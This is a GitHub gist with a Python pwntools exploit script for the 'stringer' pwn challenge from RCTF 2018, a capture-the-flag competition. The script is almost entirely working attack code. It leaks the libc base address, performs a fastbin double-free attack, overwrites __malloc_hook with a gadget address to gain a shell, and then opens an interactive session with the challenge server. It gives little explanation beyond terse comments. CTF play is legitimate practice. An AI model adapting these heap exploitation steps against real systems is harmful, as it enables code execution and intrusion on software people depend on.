Skip to content

Instantly share code, notes, and snippets.

@hama7230

hama7230/exploit.py

Created May 21, 2018
Embed
What would you like to do?
#!/usr/bin/env python
# RCTF 2018 stringer pwn
from pwn import *
context(terminal=['tmux', 'splitw', '-h']) # horizontal split window
# context(terminal=['tmux', 'new-window']) # open new window
# libc = ELF('')
elf = ELF('./stringer')
context(os='linux', arch=elf.arch)
# context(log_level='debug') # output verbose log
RHOST = "stringer.2018.teamrois.cn"
RPORT = 7272
LHOST = "127.0.0.1"
LPORT = 7272
def section_addr(name, elf=elf):
return elf.get_section_by_name(name).header['sh_addr']
def dbg(ss):
log.info("%s: 0x%x" % (ss, eval(ss)))
conn = None
opt = sys.argv.pop(1) if len(sys.argv) > 1 else '?' # pop option
if opt in 'rl':
conn = remote(*{'r': (RHOST, RPORT), 'l': (LHOST, LPORT)}[opt])
elif opt == 'd':
gdbscript = """
continue
""".format(hex(elf.symbols['main'] if 'main' in elf.symbols.keys() else elf.entrypoint))
conn = gdb.debug(['./stringer'], gdbscript=gdbscript)
else:
conn = process(['./stringer'])
# conn = process(['./stringer'], env={'LD_PRELOAD': ''})
if opt == 'a': gdb.attach(conn)
def new(size, content):
conn.sendlineafter('choice: ', '1')
conn.sendlineafter('length: ', str(size))
conn.sendlineafter('content: ', content)
def edit(idx, byte):
conn.sendlineafter('choice: ', '3')
conn.sendlineafter('index: ', str(idx))
conn.sendlineafter('index: ', str(byte))
def delete(idx):
conn.sendlineafter('choice: ', '4')
conn.sendlineafter('index: ', str(idx))
# exploit
log.info('Pwning')
new(0xf8, 'x'*0xf8) # 0
new(0x68, 'z'*0x68) # 1
delete(0)
new(0x68, 'a'*4) # 2
new(0x68, 'b'*4) # 3
# set IS_MAPPED
for _ in range(2):
edit(0, 0xd8)
new(0x18, '') # 4
conn.recvuntil('string: ')
libc_base = u64(conn.recv(6)+'\x00'*2) - 0x3c4b0a
dbg('libc_base')
# fastbin attack
delete(2)
delete(3)
delete(2)
new(0x68, p64(libc_base+0x3c4aed))
new(0x68, 'hoge')
new(0x68, 'hoge')
# overwrite __malloc_hook
payload = '\x00'*3 + p64(0)*2 + p64(libc_base + 0xf02a4)
new(0x68, payload)
conn.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.